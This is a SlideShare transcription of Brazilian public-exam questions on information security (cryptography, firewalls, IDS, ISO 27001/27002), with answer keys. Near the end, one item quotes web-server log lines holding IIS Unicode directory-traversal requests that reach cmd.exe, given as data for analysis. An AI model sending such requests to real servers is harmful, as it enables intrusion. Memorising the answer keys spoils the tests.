CESPE - TRIBUNAL DE CONTAS DA UNIÃO - CONCURSO PÚBLICO PARA PROVIMENTODE CARGOS DE ANALISTA DE CONTROLE EXTERNOCARGO 2.4: ...
(certificationauthorities), o administrador da rede, ao analisar qual foi a entidade que    assinou digitalmente o certifi...
C106 A técnica denominada SQL injection tem por objetivo o acesso a bancos de dados por    meio de aplicações web. Ataques...
Acerca de criptografia, uma das técnicas fundamentais para asegurança da informação, deprotocolos criptográficos e desiste...
E97Os programas conhecidos como spyware são um tipo de trojanque tem por objetivo coletar   informações acerca das ativida...
C109 O reconhecimento da confiança em um certificado digital podeser feito por delegação,    com      uso      de     terc...
informação de grandes organizações para sistemas de propósito geral acessíveis universalmente, surgiua preocupação com a s...
um terceiroconfiável (TC). Julgue os itens de 161 a 163, acerca dasinformações apresentadas e dosconceitos de ataques edis...
C169 No modelo em apreço, o subsistema de planejamento doSGSI possui sobreposição de atividadescom a fase dedefinição do c...
5       Política de Segurança6       Organizando a Segurança da Informação7       Gestão de Ativos8       Segurança em Rec...
/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 20...
E3 A página inicial do servidor Web atacado residia em ―Default.htm‖.        C4 O servidor utiliza uma forma elementar de ...
41 - Um administrador recebeu a tarefa de instalar um sistema dedetecção de intrusão (IDS) adequadoem sua rede. Consideran...
5 A detecção de um sniffer quase sempre acontece comsucesso, sendo a sua identificação        fundamentada noendereço MAC....
saída,pode-se considerar esse como um bom método para a geraçãodos 128 bits necessários          para uma chave com uma ap...
Upcoming SlideShare
Loading in …5
×

Questoes concurso13122011-com respostas

2,833 views
2,712 views

Published on

Questões de concursos sobre Segurança da Informação.

Published in: Education
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,833
On SlideShare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
68
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Questoes concurso13122011-com respostas

  1. 1. CESPE - TRIBUNAL DE CONTAS DA UNIÃO - CONCURSO PÚBLICO PARA PROVIMENTODE CARGOS DE ANALISTA DE CONTROLE EXTERNOCARGO 2.4: ANALISTA DE CONTROLE EXTERNO – ÁREA: APOIO TÉCNICO EADMINISTRATIVO – ESPECIALIDADE: TECNOLOGIA DA INFORMAÇÃOAplicaçâo: 3/8/2008Na rede de computadores de uma organização pública brasileira com diversos ativos, como,por exemplo, switches, roteadores, firewalls, estações de trabalho, hosts servidores deaplicação web, servidores de bancos de dados, é comum a ocorrência de ataques e de outrosincidentes que comprometem a segurança de seus sistemas. Nessa organização, a definiçãode políticas e metodologias adequadas para se lidar com esse tipo de problema cabe aodepartamento de TI.A partir da situação apresentada acima, julgue os itens de 167 a 180, relativos à segurança dainformação.C167 Se, na rede de computadores da organização citada, para garantir maior confidencialidade na troca de dados entre duas de suas máquinas, seus administradores empregarem a técnica conhecida como cifra de transposição para cifrar determinado conjunto de mensagens, então, nessas duas máquinas, devem ser utilizadas chaves simétricas.C168 Caso a rede de computadores dessa organização utilize oalgoritmo DES (data encryption standard) e osadministradores dessa rede decidam empregar a técnicaconhecida como whitening, com o objetivo de reduzir asvulnerabilidades de um dos sistemas criptográficosempregados na rede, haverá um acréscimo de bits à chavecriptográfica original, reduzindo as chances de sucesso deuma eventual criptoanálise desse sistema.E169Se, para a troca de mensagens seguras na rede de computadores da organização citada, seus vários dispositivos móveis empregarem sistemas baseados no algoritmo criptográfico 3DES (DES triplo) e os vários dispositivos não-móveis utilizarem sistemas baseados no algoritmo simples DES, a superação da diferença entre os algoritmos criptográficos empregados pelos sistemas de troca de mensagens seguras usados por dispositivos móveis e não-móveis dessa rede pode ser feita pelo administrador por meio da definição K1 = K2 = K3 = K, em que K1, K2 e K3 são as três chaves usadas no 3DES e K é a chave usada no simples DES e compartilhada entre dois dispositivos quaisquer das duas categorias mencionadas.C170Caso os computadores da rede da organização em apreço, empregando sistemas baseados no algoritmo RSA, troquem mensagens com computadores localizados na Internet, é correto afirmar que a segurança obtida baseia-se na premissa de que é atualmente difícil fatorar números grandes e de que a criptografia empregada suporta as características de não-repúdio e autenticidade de pelo menos uma das partes da comunicação.C171 Caso ocorra, na comunicação entre os computadores da rede da organização mencionada, o problema conhecido como man-in-the-middleattack, uma solução eficaz será utilizar uma autoridade de certificação, que provê alto grau de confiança durante o processo de distribuição de chaves públicas.E172 Se, com o fim de permitir a assinatura de certificados digitaise de mensagens trocadas entre seus computadores ecomputadores de redes abertas, o administrador da rede tiverimplementado o uso de sistemas criptográficos baseados noalgoritmo message- digest5 (MD5), nesse caso, a partir doinstante em que esse sistema entra em uso efetivo, todos oscertificados e mensagens digitalmente assinados e em que foiempregado o MD5 passam a gerar sumários de mensagenscom tamanho de 160 bits; além disso, o uso desse sistemaaumenta a garantia de integridade das comunicações, quandocomparado a sistemas que não possibilitam assinaturadigital.E173 Se a rede de uma organização atuar de forma integrada a uma infra-estrutura de chave pública, de natureza hierárquica, formada por RAs (regional authorities) e CAs
  2. 2. (certificationauthorities), o administrador da rede, ao analisar qual foi a entidade que assinou digitalmente o certificado público de cada membro dessa infra-estrutura de chave pública, constatará que todos os certificados analisados foram assinados pela autoridade certificadora raiz.C174 Em caso de ataques do tipo e-mail spoofing aos usuários da rede, recomenda-se que o administrador da rede adote o uso de certificados do tipo X.509, o qual permitirá aos destinatários identificarem corretamente os e-mails recebidos.E175 Para confirmar a suspeita de que a indisponibilidade apresentada por um host da rede de computadores de uma organização está sendo causada por um ataque do tipo smurf, o administrador deverá verificar se há um grande número de pacotes ICMP (Internet controlmessageprotocol) do tipo request originados de vários computadores pertencentes a uma mesma rede e direcionados a este host.C176 Considere que um dos hosts da rede de uma organização esteja sofrendo um ataque da classe de negação de serviço (denialofservice – DoS) e que, visando identificar de forma mais precisa o ataque que o host está sofrendo, o administrador tenha constatado que há elevada razão entre o número de pacotes TCP do tipo SYN e o número de pacotes TCP do tipo ACK que estão sendo enviados para o host sob ataque e que, por outro lado, a razão entre o número de pacotes TCP do tipo SYN recebidos pelo host e o número de pacotes do tipo SYN/ACK enviados pelo host é aproximadamente igual a 1. Nessa situação, o administrador deverá considerar a possibilidade de o ataque sob análise ser do tipo SYN flood, visto que são reduzidas as chances de o ataque ser do tipo NAK/ACK.C177 Se houver suspeita de que um dos sistemas web da rede de uma organização está sob ataque do tipo SQL injection, érecomendada ao administrador do sistema web a ofuscaçãode nomes das tabelas e dos campos do SGBD usados poresse sistema, o que pode reduzir as chances de que tal ataqueseja bem-sucedido. O simples aumento da segurança noacesso ao host em que se encontra o SGBD não fará que osdados armazenados no banco de dados deixem de serexpostos a consultas indevidas decorrentes de ataques dotipo SQL injection.E178No caso de o administrador implementar, na ligação da redeà Internet, um firewall do tipo nível de rede, para permitir ofuncionamento correto de um servidor DNS no interior desua rede, será necessário liberar, no firewall, apenas o acessoexterno do servidor DNS à porta 53.E179 Se um administrador implementar, na ligação da rede decomputadores à Internet, um statefull firewall, as regras defuncionamento que estão implementadas no interior dessefirewall atuarão quase que exclusivamente na camada 4 e,eventualmente, na camada 7 do modelo OSI.C180 Se o administrador da rede de computadores tiver deescolher entre implantar um proxy firewall ou um firewall dotipo packetfilter, a sua decisão deverá basear-se em um dosdois critérios seguintes: necessidade de atuação na camadade aplicação ou maior vazão de dados. Se o critériopreponderante for o primeiro, então, a decisão deve serfavorável à instalação de proxy firewalls; se for o segundo,deve ser escolhido um packetfilter.PODER JUDICIÁRIOSUPERIOR TRIBUNAL DE JUSTIÇACONCURSO PÚBLICO PARA FORMAÇÃO DE CADASTRO DE RESERVANOS CARGOS DE ANALISTA JUDICIÁRIO E DE TÉCNICO JUDICIÁRIOCARGO 2: ANALISTA JUDICIÁRIO – ÁREA: APOIO ESPECIALIZADO – ESPECIALIDADE:INFORMÁTICACom respeito a vulnerabilidades e ataques a sistemas computacionais, julgue os itens que seseguem.
  3. 3. C106 A técnica denominada SQL injection tem por objetivo o acesso a bancos de dados por meio de aplicações web. Ataques embasados nessa técnica podem ser evitados por checagem de dados de entrada no backend e frontend da aplicação.C107 Ataques denominados buffer overflows, tanto na heap quanto na stack, levam à execução arbitrária de código, podendo ser evitados pela retirada de privilégios de execução e pela checagem de integridade das estruturas citadas.E108 Em geral, firewalls com inspeção de estado evitam ataques do tipo buffer overflow.C109 Em redes IP que utilizam switches, pode-se realizar a escuta do tráfego com o ARP spoofing.E110 O WEP do padrão 802.11 é o protocolo atualmente considerado seguro para se garantir o sigilo dos dados que trafegam na rede.Com relação aos sistemas criptográficos, julgue os itens subseqüentes.E111 O sistema RSA é seguro contra ataques adaptativos de texto cifrado escolhido.C112 O esquema OAEP apresenta segurança demonstrável no caso em que utiliza o RSA, devido às propriedades deste último.C113 Os sistemas de criptografia simétrica utilizam apenas uma chave, que é usada tanto para cifração quanto para decifração.E114 Do ponto de vista do custo computacional, os sistemas assimétricos apresentam melhor desempenho que os sistemas simétricos.C115 Os sistemas de criptografia assimétrica utilizam duas chaves:uma pública, que é usada para cifração; e uma privada, queé usada para decifração.CESPE - SUPERIOR TRIBUNAL DE JUSTIÇAAplicação: 9/5/2004Por meio da padronização de protocolos, o TCP/IP permite que sistemas operacionais distintosse comuniquem. Com relação à comunicação de sistemas operacionais distintos por meio doTCP/IP, julgue os itens que se seguem.C66 O sistema SAMBA, encontrado no Linux, permite que seja emulado um servidor de domínio Windows NT em redes TCP/IP. Mediante esse processo, estações Windows podem ser autenticadas em um servidor Linux que esteja executando o SAMBA.C67 O secureshell (SSH) permite que uma estação Windows se conecte remotamente a uma estação Unix que lhe forneça um SHELL remoto por meio de mecanismos de criptografia assimétrica, com o uso de um cliente SSH. O SSH possui duas versões básicas do protocolo (1 e 2) e porta padrão TCP 22.Várias técnicas são empregadas para a descoberta de vulnerabilidades em sistemascomputacionais. Uma das mais utilizadas para o começo de um ataque de vulnerabilidades é avarredura de portas. Acerca de técnicas de varredura de portas, julgue os itens que se seguem.E121 Na técnica TCP SYN scanning, é feita uma conexão TCP completa.C122 Na técnica TCP FIN scanning, portas abertas não respondem ao pacote FIN com a resposta RST correta.E123 Na técnica de fragmentationscanning, normalmente um atacante gera os pacotes IP de forma fragmentada. Isso torna mais fácil sua detecção com o uso de filtros, uma vez que é necessário que o primeiro fragmento chegue ao destino.
  4. 4. Acerca de criptografia, uma das técnicas fundamentais para asegurança da informação, deprotocolos criptográficos e desistemas de criptografia e aplicações, julgue ositenssubseqüentes.E124 O modo de operação cipherblockchain (CBC) pode seraplicado à maioria dos algoritmos de criptografia. Na suautilização como algoritmo data encryption standard (DES),o modo CBC impede que um atacante substitua um blococifrado sem ser descoberto. Entretanto, o modo CBC doDES apresenta o inconveniente de permitir que um erro emum bloco cifrado afete a decifração de todos os demaisblocos.C125 Um protocolo de assinatura digital deve apresentar comopropriedades básicas a impossibilidade de fabricação deassinaturas por terceiros e a garantia da autenticidade dedeterminada assinatura. Além disso, deve garantir que umatransação com assinatura digital seja inalterável e não possaser reutilizada em outra ocasião.C126 Um dos fatores que complicam o emprego de sistemas decriptografia simétricos com chave privada única é anecessidade de distribuir e armazenar N x (N – 1) / 2chaves,caso haja um canal criptográfico próprio para cada par deusuários em um conjunto de N usuários.Em relação a características de firewalls, julgue os itens a seguir.C127 Um firewall StateFull permite o controle de uma conexão TCP/IP por meio de estado interno, de forma que os pacotes não são tratados independentemente, mas sim em um contexto de uma conexão.C128 Firewalls do tipo brigdes trabalham na camada de enlace. Sua detecção é muito difícil porque funcionam de forma transparente para os usuários fim-a-fim.CESPE - DEPARTAMENTO DE POLÍCIA FEDERALAplicação: 9 e 10/10/2004A política de segurança é um conjunto de diretrizes, normas, procedimentos e instruções detrabalho que estabelecem os critérios de segurança para serem adotados no nível local ou ainstitucional, visando o estabelecimento, a padronização e a normalização da segurança tantono âmbito humano quanto tecnológico. Acerca das boas práticas para elaboração, implantaçãoe monitoração da política de segurança, julgue os itens seguintes.E93A elaboração de uma política de segurança institucional deve refletir, sobretudo, o know- how de segurança dos profissionais envolvidos com a sua elaboração e não a cultura da organização.E94A política de segurança não deve ter caráter punitivo, mas conscientizador e participativo. Assim, na política de segurança não se definem sanções ou penalidades aplicáveis em caso de descumprimento das normas. Ao contrário, definem-se responsabilidades e o impacto do não cumprimento adequado do papel de cada um na gestão da segurança como um todo.C95 A política precisa ser aprovada pela administração da organização e formalmente comunicada a todos que devem cumpri-la, caso contrário sua aplicação torna-se de difícil controle e aceitação.C96Uma fonte primária para a definição dos requisitos de segurança consiste na avaliação de riscos dos ativos de informação. Essa análise permite ainda equilibrar os gastos com os controles de segurança de acordo com os danos causados aos negócios gerados pelas potenciais falhas na segurança.Os sistemas de informação possuem diversas vulnerabilidades quepodem ser exploradas parase comprometer a segurança da informação.Para reduzir os riscos de segurança, empregam-se diversos mecanismosde controle e de proteção física e lógica desses sistemas. Acerca dasvulnerabilidades e proteções dos sistemas de informação, julgue ositens a seguir.
  5. 5. E97Os programas conhecidos como spyware são um tipo de trojanque tem por objetivo coletar informações acerca das atividades deum sistema ou dos seus usuários e representam uma ameaça àconfidencialidade das informações acessadas no sistema infectado.Esses programas não são considerados como vírus de computador,desde que não se repliquem a partir de um sistema onde tenhamsido instalados.E98Um ataque de scanner consiste na monitoração de serviços eversões de software que estão sendo executados em umdeterminado sistema. Um sistema firewall que implementa umfiltro de conexões é capaz de anular os efeitos desse tipo deataque.E99A captura de pacotes que trafegam na rede com uso de um snifferé um exemplo de ataque para o qual não há nenhuma forma dedetecção possível pelo administrador de rede.E100 Um ataque de buffer overflow consiste em desviar o fluxo deexecução de um software para um programa arbitrário que estejacopiado no disco rígido do sistema atacado. Esse é um exemploclássico de backdoor resultante de um defeito de programação,que só pode ser eliminado com a atualização de versão dosoftware defeituoso.E101 Firewall e proxy são sinônimos para descrever equipamentos querealizam conexões de rede externas para nodos que não estejamconectados diretamente à Internet.E102 Um sistema de detecção de intrusão (IDS) por uso incorretoutiliza descrições de ataques previamente conhecidos (assinaturas)para identificar a ocorrência de ataques. Esse tipo de IDS temcomo inconveniente a geração de um número elevado de falsospositivos quando ataques novos, para os quais ainda não foramespecificadas assinaturas de ataque convenientes, são lançadoscontra o sistema monitorado pelo IDS.A criptografia moderna tem três tipos de ferramentas básicas:algoritmos criptográficossimétricos e assimétricos e as funções deresumo de mensagem. Acerca dos principaisalgoritmos para essestipos de ferramenta criptográfica, julgue os itens subseqüentes.E103 Cada uma das chaves pública e privada de um criptossistemaRSA são formadas por dois números inteiros denominadosexpoente e módulo, ambos devendo ser números primos.C104 O algoritmo criptográfico DES é uma cifra de substituição quemapeia um bloco de texto claro de 64 bits em um outro blocode criptograma de 64 bits.E105 O DES e o seu sucessor como padrão de criptografia dogoverno norte-americano, o AES, são cifradores de bloco queobedecem o esquema geral de cifradores de Feistel. Nessescifradores, os blocos cifrados são divididos em metades (ladoesquerdo e lado direito) de mesmo tamanho, que sãoprocessadas independentemente, a cada rodada de cifração.Esse processo faz que apenas metade dos bits do bloco cifradosofra influência da chave, em cada rodada, introduzindoconfusão no processo criptográfico.E106 MD5 e SHA-1 são funções de resumo de mensagem (funçõeshash). Esses algoritmos têm a finalidade de garantir aintegridade e a autenticidade para mensagens de tamanhoarbitrário.C107 O algoritmo criptográfico RC4 tem como princípio defuncionamento o segredo criptográfico perfeito, em que achave criptográfica deve ter o mesmo tamanho que amensagem. Desse modo, no RC4, a chave de criptografia é asemente de uma seqüênciapseudo-aleatória que é usada parachavear os bytes cifrados em uma operação linear.A mensagem cifrada pode ser tão longa quanto o período daseqüência gerada.As aplicações web que necessitam de segurança criptográfica dosdados transmitidos entre onavegador (cliente) e o servidor webutilizam o protocolo SSL/TLS para o estabelecimento desessõesseguras. Acerca do SSL/TLS e suas aplicações, julgue os itens aseguir.E108 Para o estabelecimento de uma sessão SSL, é necessário queo servidor e o cliente tenham um certificado digital válido.Esses certificados devem ser trocados e reconhecidos pelosdestinatários como certificados confiáveis.
  6. 6. C109 O reconhecimento da confiança em um certificado digital podeser feito por delegação, com uso de terceiras partesmutuamente confiáveis, denominadas autoridadescertificadoras.E110 Certificados digitais são assinados com criptografiaassimétrica. A mesma chave usada para assinar o certificadodeve ser usada para assinar as requisições de chave de sessão,o que garante a autenticidade e o não-repúdio noestabelecimento da sessão e serve como comprovação dapropriedade do certificado.C111 Durante a fase de transmissão de dados, os dados são cifradoscom criptografia simétrica.E112 Para se definir os algoritmos de criptografia simétrica queserão usados em uma sessão SSL, cliente e servidor trocamuma mensagem informando qual é a suíte de algoritmos quecada um suporta. Cabe ao servidor a escolha do algoritmo queserá usado, tendo como critério o algoritmo que suporte amaior chave simétrica, em número de bits.CESPE, ANATEL, 08/03/09, cargo 16-caderno ALFACom o desenvolvimento da Internet e a migração de um grande número de sistemas especializados de
  7. 7. informação de grandes organizações para sistemas de propósito geral acessíveis universalmente, surgiua preocupação com a segurança das informações no ambiente da Internet. Acerca da segurança e datecnologia da informação, julgue os itens a seguir.E 27Em uma organização, a segurança da informação é responsabilidade corporativa do gerente e deveser mantida no âmbito particular desse gerente.E 28 A disponibilidade e a integridade são itens que caracterizam a segurança da informação. A primeirarepresenta a garantia de que usuários autorizados tenham acesso a informações e ativos associadosquando necessário, e a segunda corresponde à garantia de que sistemas de informações sejamacessíveis apenas àqueles autorizados a acessá-los.CESPE, ANATEL, 08/03/09, cargos: de 1 a 6 e de 11 a 15, Parte I-Nível Superior, ConhecimentosBásicosAcerca da segurança da informação, julgue os itens a seguir.C29 Segurança da Informação é a proteção contra um grande número de ameaças às informações, deforma a assegurar a continuidade dos negócios, minimizando danos comerciais e maximizando o retornode investimentos. Ela pode ser garantida fazendo-se uso de controles físicos da informação, demecanismos de controle de acesso, como firewalls e proxies, entre outras medidas.E30 Uma organização, ao estabelecer seus requisitos de segurança da informação, deve avaliar riscos, apartir da vulnerabilidade e da probabilidade de ocorrência de eventos de ameaça, sempre obtidas pormeio de dados históricos de incidentes e problemas registrados nos bancos de dados da central deserviços.CESPE, MCT/FINEP, 2009, Cargo 1635 Determinada organização, após a realização de cópia de segurança dos dados do servidor decompartilhamento de arquivo da empresa, na qual existiam projetos importantes, contratou umatransportadora para levar as fitas a um banco, onde seriam guardadas em cofre forte. Durante o trajeto, atransportadora perdeu as fitas e, dias depois, os principais projetos da empresa em questão foramdivulgados por concorrentes. Considerando a situação hipotética acima, é correto afirmar que, paraproteger os dados do backup, poderia ter sido utilizada a técnica:A de estenografia.B de criptografia.C label switching.DIPSec.E RAID 5.CESPE, MCT/FINEP, 2009, Cargo 1643 Existem pragas virtuais (malwares) que são utilizadas na Internet com intenção de controlar umcomputador remotamente sem que o usuário perceba. Esses malwares são dos mais variados tipos eutilizam diversas técnicas. Uma técnica de comunicação utilizada por determinados malwares parareceber ordens de ataques ou de envio de spam é aA RSS.B CSS.C IRC.D TIF.E HAL.CESPE, TCU, auditor federal de controle externo, cargo 3A figura acima apresenta um modelo para segurança de rede, noqual se destacam vários elementos,individualmente nomeados.Esse modelo apresenta um conjunto de elementos que compõemsoluçõespara o provimento de um canal de informação seguroentre o emissor (E) e o (D) destinatário, envolvendo
  8. 8. um terceiroconfiável (TC). Julgue os itens de 161 a 163, acerca dasinformações apresentadas e dosconceitos de ataques edispositivos de segurança de redes de computadores ecriptografia.C161 Quando do uso de criptografia simétrica, as transformaçõesrelacionadas à segurança, realizadasnos lados do emissor(E) e do destinatário (D), devem ser efetuadas com o uso deuma informação secretadenominada chave. Essa chave podeser permanente ou transitória, conforme o desenho dosalgoritmos eprotocolos de criptografia empregados. No casodo protocolo https, por exemplo, empregam-se, entreoutrosaspectos, dois tipos de chaves: chaves criptográficassimétricas e transitórias, bem como chavesassimétricaspermanentes. Adicionalmente, chaves de ambos os tipospodem ser geradas no lado doemissor (E) ou do destinatário(D) da mensagem, bem como são trocadas com o outro ladopor meio deum canal de confiança estabelecido com umterceiro confiável (TC), que é comum ao emissor eaodestinatário.C162 Considere a seguinte situação hipotética.Um analista foi incumbido de construir um sistemadecomunicações seguro baseado em uma combinação decifragem simétrica e esteganografia no qual asmensagenstrocadas entre o emissor (E) e o destinatário (D) sejamsempre de pequeno tamanho e queapenas uma pequenaquantidade de mensagens seja eventualmente trocada durantetodo o ciclo de vidado sistema. De acordo com os critériosde segurança do sistema, deverá ser providaabsolutaconfidencialidade do teor das mensagens, em detrimentode integridade e disponibilidade. Paratal tarefa, oimplementador dispõe de um gerador de números aleatóriosde elevadíssima qualidade, masprecisa fazer umaimplementação de grande simplicidade. Esses critérios e odesenho do sistema decifragem não são conhecidos pelooponente (O).Nessa situação, é mais adequado que o implementadordosistema adote um modelo com base na técnica de one-timepad, que utiliza uma cifra de fluxo, em vezde um modelobaseado no algoritmo DES (data encription standard), queutiliza cifra de bloco.C163 Considerando que o modelo mostrado na figura sejaempregado na arquitetura de um serviço decontrole deacesso baseado no Kerberos, em que existe um domínio derede que contém um servidorKerberos, vários servidores derecursos — destinatários (D) — e vários clientes de recursos— emissores(E), é correto afirmar que: o servidor Kerberosprecisa conhecer senhas de autenticação dos clientes;oservidor Kerberos precisa compartilhar chaves criptográficassimétricas com cada servidor de recursos(D); para obterbilhetes de acesso a cada servidor de recursos (D) individualdo domínio de rede, o clientede recursos (E) precisadialogar com o servidor Kerberos.Durante resposta a um incidente de segurança em umambiente de rede de computadores, um analista desegurança detecnologia da informação (TI) precisou empregar várias técnicase ferramentas para realizarcoleta de dados em vários hosts edispositivos de rede, relativas à possível presença demalwares.Algumas das técnicas e das ferramentas e alguns dos dadoscoletados foram os seguintes: Iportas TCP/IP abertas nos computadores da rede, por meioda execução de varredura; II relatos de detecção de infecções por vírus, por meio deantivírus; III log de aplicações das regras no firewall da rede, por meio deinspeção; IV nomes e assinaturas dos processos computacionais emexecução em um computador emdeterminado espaço detempo, por meio de software apropriado.Considerando essa situação hipotética, se a comparação que oanalista de segurança realizar com aúltima linha de base segurade determinado computador indicar que:E164ocorreu um aumento na quantidade e qualidade de registrosrelativos aos aspectos I e III da linhabase, mas não aoaspecto IV, então isso sugerirá a presença de worms ebackdoors na rede.C165 não há alterações junto a nenhum dos fatores I, II, III e IV,então isso evidenciará que não háinfecção por malwares.Acerca dos processos típicos de tratamento de incidentes desegurança, julgue o item abaixo.E168 A alta gestão da organização em escopo exerce maiorinfluência sobre o ponto de decisão 1 quesobre o ponto dedecisão 2, bem como contribui ativamente para proverinformações quanto às fases deidentificação de riscos, dedefinição do contexto e de análise crítica de riscos.A respeito do diagrama acima, que apresenta um modeloconceitual sistêmico da norma ABNT NBRISO/IEC 27001,julgue os itens 169 e 170.
  9. 9. C169 No modelo em apreço, o subsistema de planejamento doSGSI possui sobreposição de atividadescom a fase dedefinição do contexto presente na norma ABNT NBRISO/IEC 27005 bem como produz umainformação de saídasimilar àquela produzida durante o processo de aceitação dorisco da mesma ABNTNBR ISO/IEC 27005.C170 Entre os documentos e registros cujo controle é demandadopela norma ABNT NBR ISO/IEC 27001,destacam-se comodocumentos a declaração da política de segurança, orelatório de análise/avaliação derisco e a declaração deaplicabilidade; além disso, destacam-se como registros oslivros de visitantes, osrelatórios de auditoria, as ocorrênciasde incidentes de segurança e outros registros, inclusive denãoconformidade.O modelo da figura acima apresenta elementos individualmentenomeados e presentes em uma redehipotética, acerca dos quaisé possível inferir características de protocolos de segurança.Julgue os itensseguintes, acerca das informações apresentadas ede dispositivos de segurança de redes decomputadores.C171 Se os Endhosts A e B trocarem vários pacotes por meio deseus respectivos gateways, então nãohaverá modo fácil deo host C identificar quais dos pacotes IP trafegados entre osgateways A e B sãorelativos à comunicação entre osEndhosts A e B.E172 Considerando a necessidade de instalar um IDS para proteger a rede A, algumas opções podemser adotadas, entre elas a de usar um sistema passivo ou ativo, bem como a de usar um sistema baseadoem host ou em rede. Se a solução for adotar um sistema passivo e com base em host, então o host Cpoderá ser uma máquina adequada para essa necessidade. Se a solução for adotar um sistema reativo eembasado na rede, então podem-se usar os gateways A ou B. Se a solução for adotar um sistema reativoe baseado em host, então se poderá usar o host C.Quanto a conceitos de controle de acesso e segurança de ambientes físicos e lógicos e às informaçõescontidas na figura acima, queapresenta um modelo arquitetural da plataforma de verificação de identidadepessoal PIV, proposta pelo órgão de padronização norte-americano NIST, julgue os itens a seguir.C175 A plataforma apresentada na figura suporta identificação por múltiplos fatores; contemplaatribuições de autoridades de registroem modelo de infraestrutura de chaves públicas; não apresentaincompatibilidade com o uso de listas de certificados revogados(CRLs).C176 Não há como determinar se o modelo dessa figura emprega controle de acesso discricionário oumandatório ou ambos.A lista abaixo apresenta os títulos das seções da norma ABNTNBR ISO/IEC 27002 (17799), que contémum guia das melhorespráticas em gestão da segurança da informação. Tais seçõespossuemcorrespondente registro no anexo A da norma ABNTNBR ISO/IEC 27001, definindo grupos de objetivosde controlese controles de segurança que podem ser implementados.
  10. 10. 5 Política de Segurança6 Organizando a Segurança da Informação7 Gestão de Ativos8 Segurança em Recursos Humanos9 Segurança Física e do Ambiente10 Gerenciamento das Operações e Comunicações11 Controle de Acessos12 Aquisição, Desenvolvimento e Manutenção de Sistemasde Informação13 Gestão de Incidentes de Segurança da Informação14 Gestão da Continuidade do Negócio15 ConformidadeNos itens de 177 a 180, julgue as propostas de associação entreconceitos ou práticas de segurança e asseções da norma ABNTNBR ISO/IEC 27002.C177 O emprego de um ambiente computacional dedicado isolado,bem como a blindagemeletromagnética e o levantamentodos ativos envolvidos em processos críticos sãoabordagensdiretamente associadas ao Controle de Acessos, à SegurançaFísica e do Ambiente e àGestão da Continuidade doNegócio, respectivamente.E178 Os profissionais de segurança que realizam análise crítica delogs e controle de vulnerabilidadestécnicas relacionam-semais fortemente com os aspectos de Organização daSegurança da Informação,que com a Aquisição,Desenvolvimento e Manutenção de Sistemas de Informação.C179 A configuração de proteções de tela bloqueadas por senha eo uso de firewalls e sistemas dedetecção de intrusos sãoações apenas indiretamente ligadas à gestão de IncidentesdeSegurançadaInformaçãoeàConformidade,respectivamente.E180 A proteção de registros organizacionais, entre eles o registrode visitantes, constitui uma práticadiretamente associada àSegurança Física e do Ambiente, embora, no caso específicodo registro devisitantes, esteja prescrita visando o alcanceda Segurança em Recursos Humanos.Os trechos abaixo foram retirados de um arquivo de log referente a acessos a um servidor http.atacker1.nowhere.com - - [01/Nov/2000:18:20:49 +0000] "GET/scripts/..%C0%AF../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 306atacker2.nowhere.com - - [11/Jan/2001:09:24:05 +0000] "GET/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344atacker2.nowhere.com - - [11/Jan/2001:09:24:05 +0000] "GET/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 346atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 342atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 345atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET/wwwroot/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344atacker3.nowhere.com - - [19/Jan/2001:08:18:37 -0200] "GET/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 461atacker3.nowhere.com - - [19/Jan/2001:08:18:37 -0200] "GET/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 461atacker4.nowhere.com - - [22/Jan/2001:21:19:27 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 200 607atacker4.nowhere.com - - [22/Jan/2001:21:19:49 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:d: HTTP/1.0" 502 283atacker4.nowhere.com - - [22/Jan/2001:21:20:08 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+d: HTTP/1.0" 200 342atacker4.nowhere.com - - [22/Jan/2001:21:20:25 -0200] "GET/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+e: HTTP/1.0" 200 543atacker5.nowhere.com - - [23/Jan/2001:04:28:41 -0200] "GET
